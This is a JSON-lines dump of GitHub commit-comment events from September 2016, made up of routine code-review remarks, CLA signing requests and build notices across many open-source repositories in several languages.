{"id":"4533192007","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-image"},"payload":{"comment":{"id":18942793,"position":null,"line":null,"path":null,"commit_id":"b0fb7f03c1f1989ab01ff670d2a0b7fe6bb00ca2","created_at":"2016-09-08T10:39:09Z","updated_at":"2016-09-08T10:39:09Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-image"}},"created_at":"2016-09-08T10:39:09Z"}
{"id":"4533192598","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18942794,"position":1,"line":1,"path":"app/models/railway_station.rb","commit_id":"f88c1e4833298ea6246c35401cf8dcf288b54e2e","created_at":"2016-09-08T10:39:15Z","updated_at":"2016-09-08T10:39:15Z","body":"Хорошо бы валидацию на название станции сразу добавить"}},"created_at":"2016-09-08T10:39:15Z"}
{"id":"4533195100","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-graph"},"payload":{"comment":{"id":18942798,"position":null,"line":null,"path":null,"commit_id":"f2b9094b10c71f69cbc05e39942bd10dca40646c","created_at":"2016-09-08T10:39:45Z","updated_at":"2016-09-08T10:39:45Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-graph"}},"created_at":"2016-09-08T10:39:45Z"}
{"id":"4533195336","type":"CommitCommentEvent","actor":{"login":"nathakits"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":18942799,"position":null,"line":null,"path":null,"commit_id":"997586647d1fe8af32127474f041c8a5ac68ae55","created_at":"2016-09-08T10:39:48Z","updated_at":"2016-09-08T10:39:48Z","body":"@willpatera - My localhost shows that the indentation in the EE section is working fine. Did you merge this? I'm not sure. There is an indentation in the `md` file that is affecting the indentation on the website."}},"created_at":"2016-09-08T10:39:48Z"}
{"id":"4533195355","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":18942800,"position":5,"line":28,"path":"Makefile","commit_id":"60ffb457ee2bc1b3c9a4b90a9f8c59847dc75850","created_at":"2016-09-08T10:39:48Z","updated_at":"2016-09-08T10:39:48Z","body":"@wongsyrone 在 Linux 系统上是 iproute2, OpenWrt 上将其编译成了 ip 和 ip-full"}},"created_at":"2016-09-08T10:39:48Z"}
{"id":"4533195976","type":"CommitCommentEvent","actor":{"login":"Tnargav"},"repo":{"name":"Tnargav/pin-vanilla"},"payload":{"comment":{"id":18942801,"position":null,"line":null,"path":null,"commit_id":"15e73f774747fe19252d1e5c1cd1b1554e4f8fcb","created_at":"2016-09-08T10:39:56Z","updated_at":"2016-09-08T10:39:56Z","body":"Thanks!"}},"created_at":"2016-09-08T10:39:56Z"}
{"id":"4533196464","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/tutu"},"payload":{"comment":{"id":18942802,"position":4,"line":4,"path":"app/models/railway_station.rb","commit_id":"f88c1e4833298ea6246c35401cf8dcf288b54e2e","created_at":"2016-09-08T10:40:01Z","updated_at":"2016-09-08T10:40:01Z","body":"И где, собственно гвооря, сама модель Ticket? "}},"created_at":"2016-09-08T10:40:01Z"}
{"id":"4533198422","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-filter"},"payload":{"comment":{"id":18942805,"position":null,"line":null,"path":null,"commit_id":"725b11f7e588e1860c6df866e1fe6df9c9378290","created_at":"2016-09-08T10:40:24Z","updated_at":"2016-09-08T10:40:24Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-filter\r\n"}},"created_at":"2016-09-08T10:40:24Z"}
{"id":"4533198914","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-filter"},"payload":{"comment":{"id":18942806,"position":null,"line":null,"path":null,"commit_id":"2627765bb30c00a1b02ba242e4879287cd04b9a5","created_at":"2016-09-08T10:40:30Z","updated_at":"2016-09-08T10:40:30Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-filter"}},"created_at":"2016-09-08T10:40:30Z"}
{"id":"4533202099","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-pdf-encrypt"},"payload":{"comment":{"id":18942816,"position":null,"line":null,"path":null,"commit_id":"126171ae5724d59be3e1a366b90a984b054a274b","created_at":"2016-09-08T10:41:11Z","updated_at":"2016-09-08T10:41:11Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-pdf-encrypt\r\n"}},"created_at":"2016-09-08T10:41:11Z"}
{"id":"4533202573","type":"CommitCommentEvent","actor":{"login":"changyubiao"},"repo":{"name":"changyubiao/lamp"},"payload":{"comment":{"id":18942818,"position":null,"line":null,"path":null,"commit_id":"936dfe0eebe9f6c26fa04c42491019016b96231b","created_at":"2016-09-08T10:41:16Z","updated_at":"2016-09-08T10:41:16Z","body":"这是一个lanmp 的监控脚本。\r\ndate: 2016.09.8"}},"created_at":"2016-09-08T10:41:16Z"}
{"id":"4533206654","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-file"},"payload":{"comment":{"id":18942824,"position":null,"line":null,"path":null,"commit_id":"4ac158fc8a21bb95693da194759716f66a6cd868","created_at":"2016-09-08T10:42:07Z","updated_at":"2016-09-08T10:42:07Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-file\r\n"}},"created_at":"2016-09-08T10:42:07Z"}
{"id":"4533208602","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-color"},"payload":{"comment":{"id":18942830,"position":null,"line":null,"path":null,"commit_id":"4bf6cd28431ca0be98a490e123067430d0005a58","created_at":"2016-09-08T10:42:34Z","updated_at":"2016-09-08T10:42:34Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-lib-color\r\n"}},"created_at":"2016-09-08T10:42:34Z"}
{"id":"4533212420","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-font-pdfa"},"payload":{"comment":{"id":18942843,"position":null,"line":null,"path":null,"commit_id":"9f55996d251e71dc86d38632484cd29124c8a7a5","created_at":"2016-09-08T10:43:26Z","updated_at":"2016-09-08T10:43:26Z","body":"Would you please sign the following CLA in order to keep your contribution?\r\nhttps://cla-assistant.io/tecnickcom/tc-font-pdfa"}},"created_at":"2016-09-08T10:43:26Z"}
{"id":"4533221387","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson9"},"payload":{"comment":{"id":18942863,"position":11,"line":11,"path":"accessors.rb","commit_id":"a49493aadc56c3775eea61ae0d87bdf13f0ea3b3","created_at":"2016-09-08T10:45:32Z","updated_at":"2016-09-08T10:45:32Z","body":"У тебя переменная @var_history не проинициализирована, т.е. в ней nil. А nil нельзя просто так использовать как хеш. Сначала надо пустой хеш добавить в переменную, а потом уже можно будет добавлять ключи и значения."}},"created_at":"2016-09-08T10:45:32Z"}
{"id":"4533221438","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18942864,"position":null,"line":null,"path":null,"commit_id":"76769d177689ee0b4d2f1988b41355e26b72aa92","created_at":"2016-09-08T10:45:33Z","updated_at":"2016-09-08T10:45:33Z","body":"Sometimes it's not working for me too."}},"created_at":"2016-09-08T10:45:33Z"}
{"id":"4533221744","type":"CommitCommentEvent","actor":{"login":"tanbro"},"repo":{"name":"liushuixingyun/yunhuni-server-api-docs"},"payload":{"comment":{"id":18942865,"position":null,"line":null,"path":null,"commit_id":"96a083746ef3fd901c96f69bee817b6df7455182","created_at":"2016-09-08T10:45:37Z","updated_at":"2016-09-08T10:45:37Z","body":"@nws123045088 文胜，注意命名的变化！特别是事件中的！"}},"created_at":"2016-09-08T10:45:37Z"}
{"id":"4533222509","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942866,"position":87,"line":null,"path":"Source/Atomic/Atomic3D/AnimationBlender.cpp","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T10:45:47Z","updated_at":"2016-09-08T10:45:47Z","body":"This should be something like XMLElement elem = xml->createRoot(\"animblender\")"}},"created_at":"2016-09-08T10:45:47Z"}
{"id":"4533224292","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942869,"position":99,"line":null,"path":"Source/Atomic/Atomic3D/AnimationBlender.cpp","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T10:46:14Z","updated_at":"2016-09-08T10:46:14Z","body":"Copy paste mistake. update this log"}},"created_at":"2016-09-08T10:46:14Z"}
{"id":"4533226029","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942873,"position":105,"line":null,"path":"Source/Atomic/Atomic3D/AnimationBlender.cpp","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T10:46:36Z","updated_at":"2016-09-08T10:46:36Z","body":"Do you need this texture?"}},"created_at":"2016-09-08T10:46:36Z"}
{"id":"4533227313","type":"CommitCommentEvent","actor":{"login":"foragerr"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":18942875,"position":null,"line":null,"path":null,"commit_id":"c3aceeb5c36c1265b242dc18d9c926c532ad6e90","created_at":"2016-09-08T10:46:56Z","updated_at":"2016-09-08T10:46:56Z","body":"Hi, have you had a chance to test this out? This is a feature I've been wanting to add."}},"created_at":"2016-09-08T10:46:56Z"}
{"id":"4533230142","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942881,"position":59,"line":null,"path":"Source/Atomic/Atomic3D/AnimationBlender.h","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T10:47:35Z","updated_at":"2016-09-08T10:47:35Z","body":"For rest of this commit going to assume it's intermediate and you're not done updating"}},"created_at":"2016-09-08T10:47:35Z"}
{"id":"4533231698","type":"CommitCommentEvent","actor":{"login":"kaiwood"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18942885,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T10:47:55Z","updated_at":"2016-09-08T10:47:55Z","body":"Hmm, tried it, looks like this doesn't work, at least on El Capitan. \r\n\r\nAs soon as I select a file, it jumps back to the default:\r\n\r\n![screen shot 2016-09-08 at 12 46 05](https://cloud.githubusercontent.com/assets/7542/18346769/6622db62-75c2-11e6-915b-f179cbf58ef0.png)\r\n\r\n![screen shot 2016-09-08 at 12 42 55](https://cloud.githubusercontent.com/assets/7542/18346773/6edaee20-75c2-11e6-8b47-59e68992d2c2.png)\r\n\r\n![screen shot 2016-09-08 at 12 43 14](https://cloud.githubusercontent.com/assets/7542/18346777/741aafa6-75c2-11e6-973d-aab2d8af8e19.png)\r\n"}},"created_at":"2016-09-08T10:47:55Z"}
{"id":"4533231668","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson9"},"payload":{"comment":{"id":18942887,"position":11,"line":11,"path":"testaccessors.rb","commit_id":"a49493aadc56c3775eea61ae0d87bdf13f0ea3b3","created_at":"2016-09-08T10:47:57Z","updated_at":"2016-09-08T10:47:57Z","body":"Вот видишь, ты вынужден инициализировать переменную хешем, но это неверно, класс не должен знать, что ему что-то нужно инициализировать из модулей. Модуль должен работать так: подключил - и используй, инициализация должна быть заботой модуля."}},"created_at":"2016-09-08T10:47:57Z"}
{"id":"4533233153","type":"CommitCommentEvent","actor":{"login":"krisajenkins"},"repo":{"name":"johnsyweb/dotfiles"},"payload":{"comment":{"id":18942894,"position":null,"line":null,"path":null,"commit_id":"21a732566ddececf62d75dea64b8a615be329aab","created_at":"2016-09-08T10:48:18Z","updated_at":"2016-09-08T10:48:18Z","body":"👍 "}},"created_at":"2016-09-08T10:48:18Z"}
{"id":"4533237582","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18942912,"position":null,"line":null,"path":null,"commit_id":"4cbe552d7e7acf9b4e9eb23b50cefa3874a1f9fd","created_at":"2016-09-08T10:49:24Z","updated_at":"2016-09-08T10:49:24Z","body":"Maintenance."}},"created_at":"2016-09-08T10:49:24Z"}
{"id":"4533238316","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18942915,"position":7,"line":14,"path":"application/src/main/java/org/exoplatform/chat/portlet/chat/assets/base.less","commit_id":"56ef2e62d64c9b3990cc86200c2ead8c2f02dc0f","created_at":"2016-09-08T10:49:34Z","updated_at":"2016-09-08T10:49:34Z","body":"I agree with you, the real issue that the parents element is forcing any  width with auto/% to be 160px - `min-width :160px`"}},"created_at":"2016-09-08T10:49:34Z"}
{"id":"4533238436","type":"CommitCommentEvent","actor":{"login":"nicolaasuni"},"repo":{"name":"tecnickcom/tc-lib-barcode"},"payload":{"comment":{"id":18942916,"position":null,"line":null,"path":null,"commit_id":"7fc2674525de9d38745499181f739c5b373cacb0","created_at":"2016-09-08T10:49:35Z","updated_at":"2016-09-08T10:49:35Z","body":"@chilek no, the minimum version has been moved since to PHP 5.4 and 5.3 will not be supported."}},"created_at":"2016-09-08T10:49:35Z"}
{"id":"4533240149","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18942921,"position":null,"line":null,"path":null,"commit_id":"d906394718e935ad67e24b8c4b9d0e4b2db7f861","created_at":"2016-09-08T10:49:57Z","updated_at":"2016-09-08T10:49:57Z","body":"Maintenance. `det-sig` was later renamed to `detsig`."}},"created_at":"2016-09-08T10:49:57Z"}
{"id":"4533240958","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18942925,"position":null,"line":null,"path":null,"commit_id":"98403c0c8df031fed754bb6e9f896bccede2071b","created_at":"2016-09-08T10:50:10Z","updated_at":"2016-09-08T10:50:10Z","body":"Maintenance. `det-sig` was later renamed to `detsig`."}},"created_at":"2016-09-08T10:50:10Z"}
{"id":"4533241859","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18942927,"position":null,"line":null,"path":null,"commit_id":"53bc3f146ac5a8a11834fc8cd1348c7bd5144fb5","created_at":"2016-09-08T10:50:21Z","updated_at":"2016-09-08T10:50:21Z","body":"Maintenance."}},"created_at":"2016-09-08T10:50:21Z"}
{"id":"4533244471","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18942933,"position":188,"line":571,"path":"src/main/java/edu/cornell/kfs/fp/service/impl/RecurringDisbursementVoucherDocumentServiceImpl.java","commit_id":"b366199f3fe9c44d4d7f9a331068879362aa3c40","created_at":"2016-09-08T10:50:58Z","updated_at":"2016-09-08T10:50:58Z","body":"a service calling another service to call the handleEntryCancellation does not seem the cleanest why. Should this call getPaymentSourceHelperService().handleEntryCancellation() directly? or maybe define a handleEntryCancellation in CuDisbursementVoucherExtractionHelperService that calls the one in PaymentSourceHelperService?"}},"created_at":"2016-09-08T10:50:58Z"}
{"id":"4533245692","type":"CommitCommentEvent","actor":{"login":"koya-io"},"repo":{"name":"Tunous/EverybodyEditsProtocol"},"payload":{"comment":{"id":18942938,"position":null,"line":null,"path":null,"commit_id":"a652f9cc258bbad4b64c44cf44881a56c53fff2c","created_at":"2016-09-08T10:51:16Z","updated_at":"2016-09-08T10:51:16Z","body":"Correcting name"}},"created_at":"2016-09-08T10:51:16Z"}
{"id":"4533246444","type":"CommitCommentEvent","actor":{"login":"iaguis"},"repo":{"name":"alban/linux"},"payload":{"comment":{"id":18942939,"position":4,"line":249,"path":"drivers/connector/cn_proc.c","commit_id":"8a5ce0ab82efa45f0c6ff5a80f9434d149b769bf","created_at":"2016-09-08T10:51:26Z","updated_at":"2016-09-08T10:51:26Z","body":"why `nm` and not `ns`?"}},"created_at":"2016-09-08T10:51:26Z"}
{"id":"4533251107","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18942945,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T10:52:33Z","updated_at":"2016-09-08T10:52:33Z","body":"Yes, but we had a compatibility file which had both Action and Func defined in it.\r\n\r\nDid that go away at some point?"}},"created_at":"2016-09-08T10:52:33Z"}
{"id":"4533254675","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"tecnickcom/tc-lib-pdf-parser"},"payload":{"comment":{"id":18942953,"position":null,"line":null,"path":null,"commit_id":"8933621df1d2bca67701f24f4325254cf7fccd13","created_at":"2016-09-08T10:53:24Z","updated_at":"2016-09-08T10:53:24Z","body":"Signed."}},"created_at":"2016-09-08T10:53:24Z"}
{"id":"4533255592","type":"CommitCommentEvent","actor":{"login":"fractalf"},"repo":{"name":"mreinstein/node-gearman"},"payload":{"comment":{"id":18942956,"position":null,"line":null,"path":null,"commit_id":"f24839fe2f8d7c7e8d0f2a6a622eca537b5d8ddf","created_at":"2016-09-08T10:53:37Z","updated_at":"2016-09-08T10:53:37Z","body":"Nice work @mreinstein and thanks for this lib! :)"}},"created_at":"2016-09-08T10:53:37Z"}
{"id":"4533257235","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"tecnickcom/tc-lib-pdf-parser"},"payload":{"comment":{"id":18942959,"position":null,"line":null,"path":null,"commit_id":"8933621df1d2bca67701f24f4325254cf7fccd13","created_at":"2016-09-08T10:54:00Z","updated_at":"2016-09-08T10:54:00Z","body":"Singed"}},"created_at":"2016-09-08T10:54:00Z"}
{"id":"4533257421","type":"CommitCommentEvent","actor":{"login":"binky123"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18942960,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-08T10:54:03Z","updated_at":"2016-09-08T10:54:03Z","body":"Just wondering, is it possible to increase LMR to moves which are not a threat? I ask because engines generally love pruning or LMR, not the other way around."}},"created_at":"2016-09-08T10:54:03Z"}
{"id":"4533264136","type":"CommitCommentEvent","actor":{"login":"alexandratanef"},"repo":{"name":"andreiolar/star-challange"},"payload":{"comment":{"id":18942971,"position":null,"line":null,"path":null,"commit_id":"1e1acfee62e333447413110c068c870f0101f2ee","created_at":"2016-09-08T10:55:28Z","updated_at":"2016-09-08T10:55:28Z","body":"@kardash  I see several commit from you on this projects. \r\nPlease, point out reason for such contribution ! "}},"created_at":"2016-09-08T10:55:28Z"}
{"id":"4533266001","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18942975,"position":27,"line":144,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"a194dd3d402fe9961d766ae69087b31ba841ae88","created_at":"2016-09-08T10:55:53Z","updated_at":"2016-09-08T10:55:53Z","body":"I'll use `compactIfPossible` here as well"}},"created_at":"2016-09-08T10:55:53Z"}
{"id":"4533272213","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18942984,"position":4,"line":87,"path":"core/util.runtime/src/org/jetbrains/kotlin/utils/collections.kt","commit_id":"a194dd3d402fe9961d766ae69087b31ba841ae88","created_at":"2016-09-08T10:57:21Z","updated_at":"2016-09-08T10:57:21Z","body":"Ok, I think It's worth doing that"}},"created_at":"2016-09-08T10:57:21Z"}
{"id":"4533275561","type":"CommitCommentEvent","actor":{"login":"mikesherov"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":18942988,"position":30,"line":82,"path":"lib/rules/comma-style.js","commit_id":"7502eedcf1835272d2b6893e7628a40ed8514404","created_at":"2016-09-08T10:58:10Z","updated_at":"2016-09-08T10:58:10Z","body":"Is this case ever hit?"}},"created_at":"2016-09-08T10:58:10Z"}
{"id":"4533278559","type":"CommitCommentEvent","actor":{"login":"skalk"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18942996,"position":5,"line":177,"path":"repos/base-hw/src/core/include/pager.h","commit_id":"23afcfc42f3444b366c8813f28ed88779d91cef8","created_at":"2016-09-08T10:58:52Z","updated_at":"2016-09-08T10:58:52Z","body":"It means: it prints to which Pd and thread this pager object belongs to, from my point of view we can also omit the comment, because it is clear that `void print(Output &out) const` prints an object's representation."}},"created_at":"2016-09-08T10:58:52Z"}
{"id":"4533281884","type":"CommitCommentEvent","actor":{"login":"mstade"},"repo":{"name":"zambezi/grid"},"payload":{"comment":{"id":18943005,"position":2,"line":2,"path":"src/cells.js","commit_id":"329f08c1e2f4e4a05444823e61ba0aeafdb57cfb","created_at":"2016-09-08T10:59:40Z","updated_at":"2016-09-08T10:59:40Z","body":"Hey man, [depcheck](https://www.npmjs.com/package/depcheck) is a pretty useful tool to catch these kinds of issues."}},"created_at":"2016-09-08T10:59:40Z"}
{"id":"4533284676","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18943012,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-08T11:00:18Z","updated_at":"2016-09-08T11:00:18Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.161](http://build.clear-measure.com/viewLog.html?buildId=10397&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-08T11:00:18Z"}
{"id":"4533288122","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18943022,"position":null,"line":null,"path":null,"commit_id":"c6d257f328992e5e1c383d0bdff118f34aa48668","created_at":"2016-09-08T11:01:00Z","updated_at":"2016-09-08T11:01:00Z","body":"1) The bug is in RMG. Quest are registered in \"generateObject\" - this is wrong because they may be deleted later in CRmgTemplateZone::createTreasurePile in some cases.\r\n\r\n2) This was fixed in pr #200 during some refactoring\r\n\r\n3) I`ll try to extract fix to develop"}},"created_at":"2016-09-08T11:01:00Z"}
{"id":"4533290955","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18943028,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-08T11:01:32Z","updated_at":"2016-09-08T11:01:32Z","body":"So it works when the menu item has its initial title?\n\nMight be that Apple has changed the behavior. Can you change key \nequivalent for other dynamic menu items?\n\nOn 8 Sep 2016, at 12:47, Kai Wood wrote:\n\n> Hmm, tried it, looks like this doesn't work, at least on El Capitan.\n>\n> As soon as I select a file, it jumps back to the default:\n>\n> ![screen shot 2016-09-08 at 12 46 \n> 05](https://cloud.githubusercontent.com/assets/7542/18346769/6622db62-75c2-11e6-915b-f179cbf58ef0.png)\n>\n> ![screen shot 2016-09-08 at 12 42 \n> 55](https://cloud.githubusercontent.com/assets/7542/18346773/6edaee20-75c2-11e6-8b47-59e68992d2c2.png)\n>\n> ![screen shot 2016-09-08 at 12 43 \n> 14](https://cloud.githubusercontent.com/assets/7542/18346777/741aafa6-75c2-11e6-973d-aab2d8af8e19.png)\n>\n> -- \n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/textmate/textmate/commit/dc0331b781246cf76d0f2dc3b71638d2677fac5d#commitcomment-18942885\n\n\n"}},"created_at":"2016-09-08T11:01:32Z"}
{"id":"4533294433","type":"CommitCommentEvent","actor":{"login":"antespi"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":18943038,"position":5,"line":49,"path":"mail_tracking/models/mail_message.py","commit_id":"07a28ceee46c73cf33d0895cd3bb20d7514f7a1b","created_at":"2016-09-08T11:02:20Z","updated_at":"2016-09-08T11:02:20Z","body":"I don't know, but we got one case in production environment. With this change we are sure that only one tracking email is considered"}},"created_at":"2016-09-08T11:02:20Z"}
{"id":"4533297008","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18943050,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-08T11:02:54Z","updated_at":"2016-09-08T11:02:54Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.161](http://build.clear-measure.com/viewLog.html?buildId=10397&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:36"}},"created_at":"2016-09-08T11:02:54Z"}
{"id":"4533298200","type":"CommitCommentEvent","actor":{"login":"onmyway133"},"repo":{"name":"hyperoslo/Tabby"},"payload":{"comment":{"id":18943054,"position":5,"line":8,"path":"Sources/TabbyController.swift","commit_id":"0b8d79c12ee92ba79ba35182260445f789805207","created_at":"2016-09-08T11:03:12Z","updated_at":"2016-09-08T11:03:12Z","body":"Should we remove the word `Tabby`, as we have it as namespace?"}},"created_at":"2016-09-08T11:03:12Z"}
{"id":"4533301156","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18943062,"position":4,"line":0,"path":"documentation/manual/working/scalaGuide/main/i18n/ScalaI18N.md","commit_id":"5621eeeb8938e3df3819d90b228c5042746f6db6","created_at":"2016-09-08T11:03:49Z","updated_at":"2016-09-08T11:03:49Z","body":"```\n`Result`\n```"}},"created_at":"2016-09-08T11:03:49Z"}
{"id":"4533303458","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943067,"position":22,"line":22,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:04:21Z","updated_at":"2016-09-08T11:04:21Z","body":"Please use specific imports"}},"created_at":"2016-09-08T11:04:21Z"}
{"id":"4533304655","type":"CommitCommentEvent","actor":{"login":"JDRey"},"repo":{"name":"JDRey/big-data-processes"},"payload":{"comment":{"id":18943073,"position":null,"line":null,"path":null,"commit_id":"8a766d0218be8071cb679f1ef2806a56bee8a2ac","created_at":"2016-09-08T11:04:38Z","updated_at":"2016-09-08T11:04:38Z","body":"added description of PNGs Folder contents."}},"created_at":"2016-09-08T11:04:38Z"}
{"id":"4533305702","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943077,"position":32,"line":32,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:04:51Z","updated_at":"2016-09-08T11:04:51Z","body":"Some of these blanks can be removed"}},"created_at":"2016-09-08T11:04:51Z"}
{"id":"4533309071","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943083,"position":42,"line":42,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:05:37Z","updated_at":"2016-09-08T11:05:37Z","body":"Indentation seems inconsistent throughout "}},"created_at":"2016-09-08T11:05:37Z"}
{"id":"4533313085","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18943089,"position":null,"line":null,"path":null,"commit_id":"bf6c200770ed539493b41304ba86f0fe36ea73d1","created_at":"2016-09-08T11:06:33Z","updated_at":"2016-09-08T11:06:33Z","body":"That's nice. Two features that we can implement in the future is a function to search, and the other is a jump to the current line offset when switching to the hex editor"}},"created_at":"2016-09-08T11:06:33Z"}
{"id":"4533313179","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"rscipien/zap-extensions"},"payload":{"comment":{"id":18943091,"position":43,"line":43,"path":"test/org/zaproxy/zap/extension/pscanrulesBeta/CharsetMismatchScannerUnitTest.java","commit_id":"648b2e687de16835f78b7462b76d68ebabd50335","created_at":"2016-09-08T11:06:34Z","updated_at":"2016-09-08T11:06:34Z","body":"Does this condition impact the test?"}},"created_at":"2016-09-08T11:06:34Z"}
